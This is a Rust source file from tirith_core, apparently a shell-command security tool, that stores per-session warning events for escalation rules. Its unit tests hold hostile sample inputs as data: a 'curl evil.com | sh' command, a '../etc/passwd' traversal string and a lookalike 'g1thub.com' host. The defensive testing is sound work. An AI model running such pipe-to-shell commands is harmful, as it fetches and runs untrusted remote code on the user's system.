Skip to main content

tirith_core/
session_warnings.rs

1//! Per-session warning accumulator.
2//!
3//! Tracks warnings across commands within a single shell session so that
4//! escalation rules can detect repeated suspicious behavior.
5//!
6//! State is stored as JSON at `state_dir()/sessions/{session_id}.json`.
7//! All I/O is best-effort: failures are silently ignored and never alter
8//! the verdict or panic.
9
10use std::collections::VecDeque;
11use std::fs::{self, OpenOptions};
12use std::io::Write;
13use std::path::PathBuf;
14
15use fs2::FileExt;
16use serde::{Deserialize, Serialize};
17
18use crate::verdict::{Evidence, Finding};
19
20/// Maximum warning events retained per session.
21const MAX_EVENTS: usize = 100;
22/// Maximum escalation events retained per session.
23const MAX_ESCALATION_EVENTS: usize = 20;
24/// Maximum hidden events retained per session.
25const MAX_HIDDEN_EVENTS: usize = 50;
26
27/// Per-session warning accumulator.
28#[derive(Debug, Clone, Serialize, Deserialize)]
29pub struct SessionWarnings {
30    pub session_id: String,
31    pub session_start: String,
32    pub total_warnings: u32,
33    /// Aggregate hidden findings (for backward compat / quick total).
34    #[serde(default)]
35    pub hidden_findings: u32,
36    /// Hidden findings broken down by severity (recorded at detection time).
37    #[serde(default)]
38    pub hidden_low: u32,
39    #[serde(default)]
40    pub hidden_info: u32,
41    pub events: VecDeque<WarningEvent>,
42    /// Escalation events: records when an escalation rule fired, scoped per
43    /// (rule_id, domain) key. Used for cooldown matching.
44    #[serde(default)]
45    pub escalation_events: VecDeque<EscalationEvent>,
46    /// Findings hidden by paranoia filtering, for `tirith warnings --hidden`.
47    #[serde(default)]
48    pub hidden_events: VecDeque<HiddenEvent>,
49}
50
51/// A single warning event within a session.
52#[derive(Debug, Clone, Serialize, Deserialize)]
53pub struct WarningEvent {
54    pub timestamp: String,
55    pub rule_id: String,
56    pub severity: String,
57    pub title: String,
58    pub command_redacted: String,
59    pub domains: Vec<String>,
60}
61
62/// Records when an escalation rule fired, for cooldown scoping.
63///
64/// `rule_id` is the specific finding rule that crossed the threshold, or `"*"`
65/// for wildcard aggregate escalations. `domain` is set only for `domain_scoped`
66/// rules — one domain's escalation does not cool down other domains.
67#[derive(Debug, Clone, Serialize, Deserialize)]
68pub struct EscalationEvent {
69    pub timestamp: String,
70    pub rule_id: String,
71    #[serde(default, skip_serializing_if = "Option::is_none")]
72    pub domain: Option<String>,
73}
74
75/// A finding that was hidden by paranoia filtering (recorded for `tirith warnings --hidden`).
76#[derive(Debug, Clone, Serialize, Deserialize)]
77pub struct HiddenEvent {
78    pub timestamp: String,
79    pub rule_id: String,
80    pub severity: String,
81    pub title: String,
82    pub command_redacted: String,
83}
84
85impl SessionWarnings {
86    /// Create a new empty accumulator.
87    fn new(session_id: &str) -> Self {
88        Self {
89            session_id: session_id.to_string(),
90            session_start: chrono::Utc::now().to_rfc3339(),
91            total_warnings: 0,
92            hidden_findings: 0,
93            hidden_low: 0,
94            hidden_info: 0,
95            events: VecDeque::new(),
96            escalation_events: VecDeque::new(),
97            hidden_events: VecDeque::new(),
98        }
99    }
100
101    /// Count events matching `rule_id` within the last `window_minutes`.
102    pub fn count_by_rule(&self, rule_id: &str, window_minutes: u64) -> u32 {
103        let cutoff = cutoff_time(window_minutes);
104        self.events
105            .iter()
106            .filter(|e| e.rule_id == rule_id && e.timestamp.as_str() >= cutoff.as_str())
107            .count() as u32
108    }
109
110    /// Count events matching both `rule_id` and `domain` within the window.
111    pub fn count_by_rule_and_domain(
112        &self,
113        rule_id: &str,
114        domain: &str,
115        window_minutes: u64,
116    ) -> u32 {
117        let cutoff = cutoff_time(window_minutes);
118        let domain_lower = domain.to_lowercase();
119        self.events
120            .iter()
121            .filter(|e| {
122                e.rule_id == rule_id
123                    && e.timestamp.as_str() >= cutoff.as_str()
124                    && e.domains.iter().any(|d| d.to_lowercase() == domain_lower)
125            })
126            .count() as u32
127    }
128
129    /// Count all events within the window.
130    pub fn count_all(&self, window_minutes: u64) -> u32 {
131        let cutoff = cutoff_time(window_minutes);
132        self.events
133            .iter()
134            .filter(|e| e.timestamp.as_str() >= cutoff.as_str())
135            .count() as u32
136    }
137
138    /// Top rules by frequency (descending).
139    pub fn top_rules(&self) -> Vec<(String, u32)> {
140        let mut counts = std::collections::HashMap::<String, u32>::new();
141        for e in &self.events {
142            *counts.entry(e.rule_id.clone()).or_default() += 1;
143        }
144        let mut sorted: Vec<_> = counts.into_iter().collect();
145        sorted.sort_by_key(|s| std::cmp::Reverse(s.1));
146        sorted
147    }
148}
149
150/// Compute the RFC 3339 cutoff timestamp for windowed queries.
151fn cutoff_time(window_minutes: u64) -> String {
152    let cutoff =
153        chrono::Utc::now() - chrono::Duration::minutes(window_minutes.min(u32::MAX as u64) as i64);
154    cutoff.to_rfc3339()
155}
156
157/// Validate session_id and return the state file path.
158///
159/// Session IDs must be non-empty, <=128 chars, and contain only
160/// `[a-zA-Z0-9_-]` to prevent path traversal.
161pub fn session_state_path(session_id: &str) -> Option<PathBuf> {
162    if session_id.is_empty() || session_id.len() > 128 {
163        return None;
164    }
165    if !session_id
166        .chars()
167        .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')
168    {
169        return None;
170    }
171    let state = crate::policy::state_dir()?;
172    Some(state.join("sessions").join(format!("{session_id}.json")))
173}
174
175/// Load session warnings from disk. Returns an empty accumulator on any error.
176///
177/// Takes a shared lock so readers never observe the transient empty state
178/// that occurs while `record_warning()` truncates and rewrites the file.
179pub fn load(session_id: &str) -> SessionWarnings {
180    let path = match session_state_path(session_id) {
181        Some(p) => p,
182        None => return SessionWarnings::new(session_id),
183    };
184
185    let file = match fs::File::open(&path) {
186        Ok(f) => f,
187        Err(_) => return SessionWarnings::new(session_id),
188    };
189
190    // Shared lock prevents reading mid-truncate from a concurrent writer.
191    if fs2::FileExt::lock_shared(&file).is_err() && fs2::FileExt::try_lock_shared(&file).is_err() {
192        return SessionWarnings::new(session_id);
193    }
194
195    use std::io::Read;
196    let mut content = String::new();
197    let result = (&file).read_to_string(&mut content);
198    let _ = fs2::FileExt::unlock(&file);
199
200    if result.is_err() || content.is_empty() {
201        return SessionWarnings::new(session_id);
202    }
203
204    serde_json::from_str::<SessionWarnings>(&content).unwrap_or_else(|e| {
205        crate::audit::audit_diagnostic(format!(
206            "tirith: session: corrupt state for '{}': {e} — resetting",
207            session_id
208        ));
209        SessionWarnings::new(session_id)
210    })
211}
212
213/// Record warning findings into the session accumulator.
214///
215/// Thin wrapper around `record_outcome` with no hidden findings.
216pub fn record_warning(session_id: &str, findings: &[&Finding], cmd: &str, dlp_patterns: &[String]) {
217    record_outcome(session_id, findings, &[], cmd, dlp_patterns);
218}
219
220/// Record warning findings and hidden findings into the session accumulator.
221///
222/// Hidden findings are actual `Finding` references (not just counts) so that
223/// full event details can be stored for `tirith warnings --hidden`.
224///
225/// Delegates to [`with_session_locked`] for atomic lock-read-modify-write.
226/// Never panics or alters the verdict on I/O failure.
227pub fn record_outcome(
228    session_id: &str,
229    warn_findings: &[&Finding],
230    hidden_findings_list: &[&Finding],
231    cmd: &str,
232    dlp_patterns: &[String],
233) {
234    if warn_findings.is_empty() && hidden_findings_list.is_empty() {
235        return;
236    }
237
238    // Compute hidden counts from the actual findings list.
239    let hidden_count = hidden_findings_list.len() as u32;
240    let hidden_low = hidden_findings_list
241        .iter()
242        .filter(|f| f.severity == crate::verdict::Severity::Low)
243        .count() as u32;
244    let hidden_info = hidden_findings_list
245        .iter()
246        .filter(|f| f.severity == crate::verdict::Severity::Info)
247        .count() as u32;
248
249    // Pre-compute redacted command outside the lock to minimise hold time.
250    let command_redacted = crate::redact::redact_command_text(cmd, dlp_patterns);
251    let command_redacted = crate::util::truncate_bytes(&command_redacted, 120);
252    let now = chrono::Utc::now().to_rfc3339();
253
254    // Collect finding data we need so the closure does not borrow the slices.
255    struct FindingData {
256        rule_id: String,
257        severity: String,
258        title: String,
259        domains: Vec<String>,
260    }
261    let finding_data: Vec<FindingData> = warn_findings
262        .iter()
263        .map(|f| FindingData {
264            rule_id: f.rule_id.to_string(),
265            severity: f.severity.to_string(),
266            title: crate::util::truncate_bytes(&f.title, 120),
267            domains: extract_domains_from_evidence(&f.evidence),
268        })
269        .collect();
270
271    // Collect hidden finding data for HiddenEvent storage.
272    let hidden_data: Vec<FindingData> = hidden_findings_list
273        .iter()
274        .map(|f| FindingData {
275            rule_id: f.rule_id.to_string(),
276            severity: f.severity.to_string(),
277            title: crate::util::truncate_bytes(&f.title, 120),
278            domains: Vec::new(), // not needed for hidden events
279        })
280        .collect();
281
282    with_session_locked(session_id, |session| {
283        // Increment hidden findings count
284        session.hidden_findings = session.hidden_findings.saturating_add(hidden_count);
285        session.hidden_low = session.hidden_low.saturating_add(hidden_low);
286        session.hidden_info = session.hidden_info.saturating_add(hidden_info);
287
288        // Append warning events
289        for fd in &finding_data {
290            let event = WarningEvent {
291                timestamp: now.clone(),
292                rule_id: fd.rule_id.clone(),
293                severity: fd.severity.clone(),
294                title: fd.title.clone(),
295                command_redacted: command_redacted.clone(),
296                domains: fd.domains.clone(),
297            };
298            session.events.push_back(event);
299            session.total_warnings = session.total_warnings.saturating_add(1);
300        }
301
302        // Append hidden events
303        for hd in &hidden_data {
304            session.hidden_events.push_back(HiddenEvent {
305                timestamp: now.clone(),
306                rule_id: hd.rule_id.clone(),
307                severity: hd.severity.clone(),
308                title: hd.title.clone(),
309                command_redacted: command_redacted.clone(),
310            });
311        }
312
313        // Cap warning events
314        while session.events.len() > MAX_EVENTS {
315            session.events.pop_front();
316        }
317
318        // Cap hidden events
319        while session.hidden_events.len() > MAX_HIDDEN_EVENTS {
320            session.hidden_events.pop_front();
321        }
322    });
323}
324
325/// Record escalation events into the session accumulator.
326///
327/// Called from `post_process_verdict` after an escalation rule upgrades the
328/// action. Must happen outside `record_outcome` because escalated blocks are
329/// `Action::Block` which does not enter the Warn/WarnAck recording gate.
330pub fn record_escalation_event(session_id: &str, hits: &[crate::escalation::EscalationHit]) {
331    if hits.is_empty() {
332        return;
333    }
334
335    let now = chrono::Utc::now().to_rfc3339();
336
337    with_session_locked(session_id, |session| {
338        for hit in hits {
339            session.escalation_events.push_back(EscalationEvent {
340                timestamp: now.clone(),
341                rule_id: hit.rule_id.clone(),
342                domain: hit.domain.clone(),
343            });
344        }
345        // Cap escalation events
346        while session.escalation_events.len() > MAX_ESCALATION_EVENTS {
347            session.escalation_events.pop_front();
348        }
349    });
350}
351
352/// Shared helper: open session file, acquire exclusive lock, read or create
353/// session state, call `mutate` to modify it, serialize and write back,
354/// then unlock and run opportunistic GC.
355///
356/// All I/O is best-effort; failures are logged diagnostically and never panic.
357fn with_session_locked<F>(session_id: &str, mutate: F)
358where
359    F: FnOnce(&mut SessionWarnings),
360{
361    let path = match session_state_path(session_id) {
362        Some(p) => p,
363        None => return,
364    };
365
366    // Ensure directory exists
367    if let Some(parent) = path.parent() {
368        if let Err(e) = fs::create_dir_all(parent) {
369            crate::audit::audit_diagnostic(format!(
370                "tirith: session: cannot create state dir {}: {e}",
371                parent.display()
372            ));
373            return;
374        }
375    }
376
377    // Refuse to follow symlinks on Unix
378    #[cfg(unix)]
379    {
380        match std::fs::symlink_metadata(&path) {
381            Ok(meta) if meta.file_type().is_symlink() => {
382                crate::audit::audit_diagnostic(format!(
383                    "tirith: session: refusing to follow symlink at {}",
384                    path.display()
385                ));
386                return;
387            }
388            _ => {}
389        }
390    }
391
392    // Open file for read+write (atomic load-modify-write under lock).
393    let mut open_opts = OpenOptions::new();
394    open_opts.read(true).write(true).create(true);
395    #[cfg(unix)]
396    {
397        use std::os::unix::fs::OpenOptionsExt;
398        open_opts.mode(0o600);
399        open_opts.custom_flags(libc::O_NOFOLLOW);
400    }
401
402    let file = match open_opts.open(&path) {
403        Ok(f) => f,
404        Err(e) => {
405            crate::audit::audit_diagnostic(format!(
406                "tirith: session: cannot open {} — escalation may be impaired: {e}",
407                path.display()
408            ));
409            return;
410        }
411    };
412
413    // Harden permissions on existing files
414    #[cfg(unix)]
415    {
416        use std::os::unix::fs::PermissionsExt;
417        let _ = file.set_permissions(std::fs::Permissions::from_mode(0o600));
418    }
419
420    // Acquire exclusive lock BEFORE reading — this is the atomicity guarantee.
421    let locked = file.lock_exclusive().is_ok() || file.try_lock_exclusive().is_ok();
422    if !locked {
423        crate::audit::audit_diagnostic(format!(
424            "tirith: session: cannot lock {} — recording skipped",
425            path.display()
426        ));
427        return;
428    }
429
430    // Read existing state under lock
431    use std::io::Read;
432    let mut content = String::new();
433    let _ = (&file).read_to_string(&mut content);
434    let mut session: SessionWarnings = if content.is_empty() {
435        SessionWarnings::new(session_id)
436    } else {
437        serde_json::from_str(&content).unwrap_or_else(|e| {
438            crate::audit::audit_diagnostic(format!(
439                "tirith: session: corrupt state for '{}': {e} — resetting",
440                session_id
441            ));
442            SessionWarnings::new(session_id)
443        })
444    };
445
446    // Let caller mutate the session state
447    mutate(&mut session);
448
449    let json = match serde_json::to_string(&session) {
450        Ok(j) => j,
451        Err(e) => {
452            crate::audit::audit_diagnostic(format!(
453                "tirith: session: failed to serialize warnings: {e}"
454            ));
455            let _ = fs2::FileExt::unlock(&file);
456            return;
457        }
458    };
459
460    // Truncate + write under the same lock
461    use std::io::Seek;
462    if file.set_len(0).is_err() || (&file).seek(std::io::SeekFrom::Start(0)).is_err() {
463        crate::audit::audit_diagnostic(format!(
464            "tirith: session: truncate/seek failed for {} — skipping write",
465            path.display()
466        ));
467        let _ = fs2::FileExt::unlock(&file);
468        return;
469    }
470    let mut writer = std::io::BufWriter::new(&file);
471    if let Err(e) = writer.write_all(json.as_bytes()) {
472        crate::audit::audit_diagnostic(format!(
473            "tirith: session: write failed for {}: {e}",
474            path.display()
475        ));
476    }
477    if let Err(e) = writer.flush() {
478        crate::audit::audit_diagnostic(format!(
479            "tirith: session: flush failed for {}: {e}",
480            path.display()
481        ));
482    }
483    let _ = file.sync_all();
484    let _ = fs2::FileExt::unlock(&file);
485
486    // Opportunistic GC: clean up stale session files, rate-limited to once per hour.
487    opportunistic_gc();
488}
489
490/// Extract hostnames from finding evidence.
491pub fn extract_domains_from_evidence(evidence: &[Evidence]) -> Vec<String> {
492    let mut domains = Vec::new();
493    for ev in evidence {
494        match ev {
495            Evidence::Url { raw } => {
496                if let Some(host) = extract_host(raw) {
497                    domains.push(host);
498                }
499            }
500            Evidence::HostComparison { raw_host, .. } => {
501                domains.push(raw_host.to_lowercase());
502            }
503            _ => {}
504        }
505    }
506    domains.sort();
507    domains.dedup();
508    domains
509}
510
511/// Extract host from a URL string.
512fn extract_host(url: &str) -> Option<String> {
513    if let Ok(parsed) = url::Url::parse(url) {
514        return parsed.host_str().map(|h| h.to_lowercase());
515    }
516    // Schemeless fallback: take first segment before /
517    let candidate = url.split('/').next()?;
518    if candidate.contains('.') && !candidate.contains(' ') {
519        let host = candidate.split(':').next().unwrap_or(candidate);
520        return Some(host.to_lowercase());
521    }
522    None
523}
524
525/// Opportunistic garbage collection of stale session files.
526///
527/// Rate-limited to once per hour via a `.last_gc` marker file in the sessions
528/// directory. Uses a 72-hour cutoff for stale sessions.
529fn opportunistic_gc() {
530    let gc_marker = match crate::policy::state_dir() {
531        Some(d) => d.join("sessions").join(".last_gc"),
532        None => return,
533    };
534    if let Ok(meta) = fs::metadata(&gc_marker) {
535        if let Ok(modified) = meta.modified() {
536            if let Ok(age) = modified.elapsed() {
537                if age.as_secs() < 3600 {
538                    return;
539                }
540            }
541        }
542    }
543    // Touch the marker file before running GC (best-effort).
544    let _ = fs::write(&gc_marker, "");
545    gc_stale_sessions(72);
546}
547
548/// Remove session files older than `max_age_hours`.
549pub fn gc_stale_sessions(max_age_hours: u64) {
550    let state = match crate::policy::state_dir() {
551        Some(s) => s,
552        None => return,
553    };
554    let sessions_dir = state.join("sessions");
555    let entries = match fs::read_dir(&sessions_dir) {
556        Ok(e) => e,
557        Err(_) => return,
558    };
559
560    let max_age = std::time::Duration::from_secs(max_age_hours * 3600);
561    let now = std::time::SystemTime::now();
562
563    for entry in entries.flatten() {
564        let path = entry.path();
565        if path.extension().and_then(|e| e.to_str()) != Some("json") {
566            continue;
567        }
568        let meta = match fs::metadata(&path) {
569            Ok(m) => m,
570            Err(_) => continue,
571        };
572        let modified = match meta.modified() {
573            Ok(t) => t,
574            Err(_) => continue,
575        };
576        if let Ok(age) = now.duration_since(modified) {
577            if age > max_age {
578                let _ = fs::remove_file(&path);
579            }
580        }
581    }
582}
583
584/// Delete a session file.
585pub fn clear_session(session_id: &str) {
586    if let Some(path) = session_state_path(session_id) {
587        let _ = fs::remove_file(&path);
588    }
589}
590
591#[cfg(test)]
592mod tests {
593    use super::*;
594    use crate::verdict::{Evidence, Finding, RuleId, Severity};
595
596    fn make_finding(rule_id: RuleId, severity: Severity) -> Finding {
597        Finding {
598            rule_id,
599            severity,
600            title: "Test finding".to_string(),
601            description: "desc".to_string(),
602            evidence: vec![Evidence::Url {
603                raw: "https://evil.example.com/path".to_string(),
604            }],
605            human_view: None,
606            agent_view: None,
607            mitre_id: None,
608            custom_rule_id: None,
609        }
610    }
611
612    #[test]
613    fn test_session_state_path_validation() {
614        // Valid IDs
615        assert!(session_state_path("abc-123_DEF").is_some());
616        assert!(session_state_path("a").is_some());
617
618        // Reject empty
619        assert!(session_state_path("").is_none());
620
621        // Reject path traversal
622        assert!(session_state_path("../etc/passwd").is_none());
623        assert!(session_state_path("foo/bar").is_none());
624        assert!(session_state_path("..").is_none());
625
626        // Reject special chars
627        assert!(session_state_path("foo bar").is_none());
628        assert!(session_state_path("foo.bar").is_none());
629
630        // Reject too long
631        let long_id = "a".repeat(129);
632        assert!(session_state_path(&long_id).is_none());
633
634        // Accept max length
635        let max_id = "a".repeat(128);
636        assert!(session_state_path(&max_id).is_some());
637    }
638
639    #[test]
640    fn test_load_returns_default_on_missing() {
641        let session = load("nonexistent-session-id-12345");
642        assert_eq!(session.session_id, "nonexistent-session-id-12345");
643        assert_eq!(session.total_warnings, 0);
644        assert!(session.events.is_empty());
645    }
646
647    #[cfg(unix)]
648    #[test]
649    fn test_record_and_load_cycle() {
650        let _guard = crate::TEST_ENV_LOCK
651            .lock()
652            .unwrap_or_else(|e| e.into_inner());
653
654        let dir = tempfile::tempdir().unwrap();
655        let state_home = dir.path().join("state");
656        unsafe { std::env::set_var("XDG_STATE_HOME", &state_home) };
657
658        let session_id = "test-session-rec-001";
659
660        // Record two findings
661        let f1 = make_finding(RuleId::CurlPipeShell, Severity::High);
662        let f2 = make_finding(RuleId::NonAsciiHostname, Severity::Medium);
663        record_warning(session_id, &[&f1, &f2], "curl evil.com | sh", &[]);
664
665        // Load and verify
666        let session = load(session_id);
667        assert_eq!(session.total_warnings, 2);
668        assert_eq!(session.events.len(), 2);
669        assert_eq!(session.events[0].rule_id, "curl_pipe_shell");
670        assert_eq!(session.events[1].rule_id, "non_ascii_hostname");
671
672        // Verify domains extracted
673        assert!(session.events[0]
674            .domains
675            .contains(&"evil.example.com".to_string()));
676
677        // Record more and verify accumulation
678        let f3 = make_finding(RuleId::ShortenedUrl, Severity::Low);
679        record_warning(session_id, &[&f3], "bit.ly/foo", &[]);
680
681        let session = load(session_id);
682        assert_eq!(session.total_warnings, 3);
683        assert_eq!(session.events.len(), 3);
684
685        // Clear and verify
686        clear_session(session_id);
687        let session = load(session_id);
688        assert_eq!(session.total_warnings, 0);
689
690        unsafe { std::env::remove_var("XDG_STATE_HOME") };
691    }
692
693    #[test]
694    fn test_count_by_rule_with_window() {
695        let mut session = SessionWarnings::new("test");
696        // Add an event with a recent timestamp
697        session.events.push_back(WarningEvent {
698            timestamp: chrono::Utc::now().to_rfc3339(),
699            rule_id: "curl_pipe_shell".to_string(),
700            severity: "HIGH".to_string(),
701            title: "test".to_string(),
702            command_redacted: "cmd".to_string(),
703            domains: vec![],
704        });
705        // Add an event with an old timestamp (2 hours ago)
706        let old_time = (chrono::Utc::now() - chrono::Duration::hours(2)).to_rfc3339();
707        session.events.push_back(WarningEvent {
708            timestamp: old_time,
709            rule_id: "curl_pipe_shell".to_string(),
710            severity: "HIGH".to_string(),
711            title: "test".to_string(),
712            command_redacted: "cmd".to_string(),
713            domains: vec![],
714        });
715
716        // 60-min window should only catch the recent one
717        assert_eq!(session.count_by_rule("curl_pipe_shell", 60), 1);
718        // 180-min window should catch both
719        assert_eq!(session.count_by_rule("curl_pipe_shell", 180), 2);
720        // Different rule should match zero
721        assert_eq!(session.count_by_rule("non_ascii_hostname", 180), 0);
722    }
723
724    #[test]
725    fn test_count_by_rule_and_domain() {
726        let mut session = SessionWarnings::new("test");
727        session.events.push_back(WarningEvent {
728            timestamp: chrono::Utc::now().to_rfc3339(),
729            rule_id: "non_ascii_hostname".to_string(),
730            severity: "MEDIUM".to_string(),
731            title: "test".to_string(),
732            command_redacted: "cmd".to_string(),
733            domains: vec!["evil.com".to_string()],
734        });
735        session.events.push_back(WarningEvent {
736            timestamp: chrono::Utc::now().to_rfc3339(),
737            rule_id: "non_ascii_hostname".to_string(),
738            severity: "MEDIUM".to_string(),
739            title: "test".to_string(),
740            command_redacted: "cmd".to_string(),
741            domains: vec!["good.com".to_string()],
742        });
743
744        assert_eq!(
745            session.count_by_rule_and_domain("non_ascii_hostname", "evil.com", 60),
746            1
747        );
748        assert_eq!(
749            session.count_by_rule_and_domain("non_ascii_hostname", "good.com", 60),
750            1
751        );
752        assert_eq!(
753            session.count_by_rule_and_domain("non_ascii_hostname", "other.com", 60),
754            0
755        );
756    }
757
758    #[test]
759    fn test_count_all() {
760        let mut session = SessionWarnings::new("test");
761        for _ in 0..5 {
762            session.events.push_back(WarningEvent {
763                timestamp: chrono::Utc::now().to_rfc3339(),
764                rule_id: "any_rule".to_string(),
765                severity: "LOW".to_string(),
766                title: "test".to_string(),
767                command_redacted: "cmd".to_string(),
768                domains: vec![],
769            });
770        }
771        assert_eq!(session.count_all(60), 5);
772    }
773
774    #[test]
775    fn test_top_rules() {
776        let mut session = SessionWarnings::new("test");
777        for _ in 0..3 {
778            session.events.push_back(WarningEvent {
779                timestamp: chrono::Utc::now().to_rfc3339(),
780                rule_id: "rule_a".to_string(),
781                severity: "LOW".to_string(),
782                title: "test".to_string(),
783                command_redacted: "cmd".to_string(),
784                domains: vec![],
785            });
786        }
787        session.events.push_back(WarningEvent {
788            timestamp: chrono::Utc::now().to_rfc3339(),
789            rule_id: "rule_b".to_string(),
790            severity: "LOW".to_string(),
791            title: "test".to_string(),
792            command_redacted: "cmd".to_string(),
793            domains: vec![],
794        });
795
796        let top = session.top_rules();
797        assert_eq!(top[0], ("rule_a".to_string(), 3));
798        assert_eq!(top[1], ("rule_b".to_string(), 1));
799    }
800
801    #[test]
802    fn test_event_cap() {
803        let mut session = SessionWarnings::new("test");
804        for i in 0..150 {
805            session.events.push_back(WarningEvent {
806                timestamp: chrono::Utc::now().to_rfc3339(),
807                rule_id: format!("rule_{i}"),
808                severity: "LOW".to_string(),
809                title: "test".to_string(),
810                command_redacted: "cmd".to_string(),
811                domains: vec![],
812            });
813            session.total_warnings += 1;
814        }
815        // Manually apply cap as record_warning would
816        while session.events.len() > MAX_EVENTS {
817            session.events.pop_front();
818        }
819        assert_eq!(session.events.len(), MAX_EVENTS);
820        assert_eq!(session.total_warnings, 150);
821    }
822
823    #[test]
824    fn test_extract_domains_from_evidence() {
825        let evidence = vec![
826            Evidence::Url {
827                raw: "https://evil.example.com/path".to_string(),
828            },
829            Evidence::HostComparison {
830                raw_host: "GITHUB.COM".to_string(),
831                similar_to: "g1thub.com".to_string(),
832            },
833            Evidence::Text {
834                detail: "irrelevant".to_string(),
835            },
836        ];
837        let domains = extract_domains_from_evidence(&evidence);
838        assert!(domains.contains(&"evil.example.com".to_string()));
839        assert!(domains.contains(&"github.com".to_string()));
840        assert_eq!(domains.len(), 2);
841    }
842}